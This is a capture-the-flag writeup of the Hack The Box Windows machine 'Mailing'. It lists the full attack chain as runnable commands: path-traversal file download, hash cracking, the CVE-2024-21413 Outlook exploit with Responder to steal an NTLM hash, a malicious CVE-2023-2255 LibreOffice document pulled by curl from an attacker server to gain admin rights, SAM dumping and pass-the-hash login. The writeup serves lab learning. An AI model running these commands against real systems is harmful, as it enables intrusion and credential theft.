HTB Mailing Writeup


A writeup of the Hack The Box machine “Mailing” with easy difficulty

Welcome to this writeup of the HTB seasonal machine called Mailing. It is a Windows machine with easy difficulty.

Enumeration

First, run an Nmap scan, which gives the following results:

We can see a webpage called mailing.htb so we put this in the /etc/hosts file with the IP of the machine: 10.10.11.14.

This shows us the webpage >

Next, we run a dirsearch scan to enumerate directories >

Hmm alright. There is an /assets page and a /download.php page.

The /assets page only shows us beautiful pictures of nature 😊 and the download page says “No file specified for download”.

After that someone requested a machine reset lol.

Alright, so I think LFI (Local File Inclusion) is a possible entry point with this /download.php page.

User flag

After some more enumeration, I could download a hMailServer.INI file via the following URL: http://mailing.htb/download.php?file=../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI
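For defenders, the download.php request above is easy to spot in web server logs. The following Python sketch is an added example, not part of the original writeup or of the machine's code: it flags requests whose file parameter climbs out of the download directory, including percent-encoded and backslash forms, which goes slightly beyond the single URL shown above. The log layout, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not taken from the target machine).
# Assumed layout: client IP, method, request target, status code.
SAMPLE_LOG = [
    "192.0.2.10 GET /download.php?file=instructions.pdf 200",
    "192.0.2.10 GET /download.php?file=../../../Program+Files+(x86)/hMailServer/Bin/hMailServer.INI 200",
    "192.0.2.10 GET /download.php?file=%252e%252e%255c%252e%252e%255cwindows%255cwin.ini 404",
    "192.0.2.10 GET /download.php?file=C:%5Cinetpub%5Cwwwroot%5Cweb.config 404",
    "192.0.2.10 GET /assets/background.jpg 200",
    "192.0.2.10 GET /download.php 200",
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is compared in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value contains a '..' segment or is an absolute/drive/UNC path."""
    path = decode_fully(value).replace("\\", "/")
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        return True
    return ".." in path.split("/")

def traversal_hits(lines, script="/download.php", param="file"):
    """Return (line_number, client, decoded_value) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 4:
            continue
        client, target = fields[0], fields[2]
        parts = urlsplit(target)
        if parts.path.lower() != script:  # Windows web paths are case-insensitive
            continue
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if key == param and is_traversal(value):
                hits.append((number, client, decode_fully(value).replace("\\", "/")))
    return hits

if __name__ == "__main__":
    for hit in traversal_hits(SAMPLE_LOG):
        print(hit)
```

The same is_traversal check, applied before the file is opened, is also the server-side fix: reject the request instead of logging it.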

This file contains the administrator password of something >

These are hashed passwords we have to crack with hashcat > hashcat --force -m 0 -a 0 pass.txt /usr/share/wordlists/rockyou.txt, where -m 0 stands for an MD5 hash.

This password is for telnet access. Port 110 is the POP3 mail server.

With the command telnet 10.10.11.14 110 we can connect to the mailserver.

There are no messages sadly. But the username and password are correct.

With the https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability exploit a user and a password can be obtained.

Set up a Responder listener with: sudo responder -I tun0 -v

Then we run the following command > python3 CVE-2024-21413.py --server mailing.htb --port 587 --username [email protected] --password <The-password-we-obtained> --sender [email protected] --recipient [email protected] --url "\\IP/blabla" --subject Hello

This will give us a hash of a password, which we can crack with hashcat.

An Evil-WinRM session can be established with: evil-winrm -i 10.10.11.14 -u maya -p <Cracked-password>

The user flag can be found in the Desktop directory >

Root flag

After searching the directories on the machine, we discovered that LibreOffice is running an outdated version. After searching for an exploit, we can use this tool: https://github.com/elweth-sec/CVE-2023-2255 to probably gain root.

With this tool we can use the command: python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'.

We need to deliver this malicious file to the Windows machine. This can be done with a Python HTTP server and a curl command. >

In a new terminal window type: python3 -m http.server 4444

And in our Evil-WinRM session: go to the Important Documents directory (this is a root directory).

And curl the exploit.odt file to the Windows machine > curl -o exploit.odt http://10.10.14.82:4444/exploit.odt

With the command net users maya we can see that maya is now in the local admin group.

With the post-exploitation tool crackmapexec, we can run this command > crackmapexec smb 10.10.11.14 -u maya -p "<maya-admin-password>" --sam

This way we can obtain the localadmin user’s hash.

We don’t have to crack the hash if we use the impacket-wmiexec tool with the command: impacket-wmiexec [email protected] -hashes "<hash-of-administrador>"

This gives us the root flag >

Conclusion

To pwn this machine took a lot more time than I thought. Again, searching for an entry point in the directories of the machine takes time because of the many dirs and files.

I hope you have learned something from this writeup.

Enjoy your day!